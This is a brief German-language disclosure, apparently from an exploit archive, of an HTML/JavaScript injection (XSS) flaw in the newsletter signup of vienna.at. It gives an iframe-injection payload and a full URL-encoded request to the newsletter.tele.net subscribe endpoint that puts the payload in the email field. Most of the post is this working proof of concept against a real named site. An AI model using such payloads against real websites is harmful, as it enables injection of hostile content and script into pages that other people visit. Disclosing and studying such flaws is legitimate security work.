#http://vienna.at XSS Vulnerability.
#Software/Web: http://vienna.at
#Found By: elric
#Exploit:


Newsletter Anmeldung linker Frame.

HTML Inject:

z.B.
"><iframe src=http://google.com>X</iframe>

Diverse HTML/Javascript Injections unter:

z.B.
http://newsletter.tele.net/subscribe/subscribe.tml?list=vienna-newsletter&confirm=one_hello&url=http%3A%2F%2Fwww.vienna.at&email=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fgoogle.com%3EX%3C%2Fiframe%3E+&subscribe.x=26&subscribe.y=12
...


***

Elbone Network - Security
http://elbone.net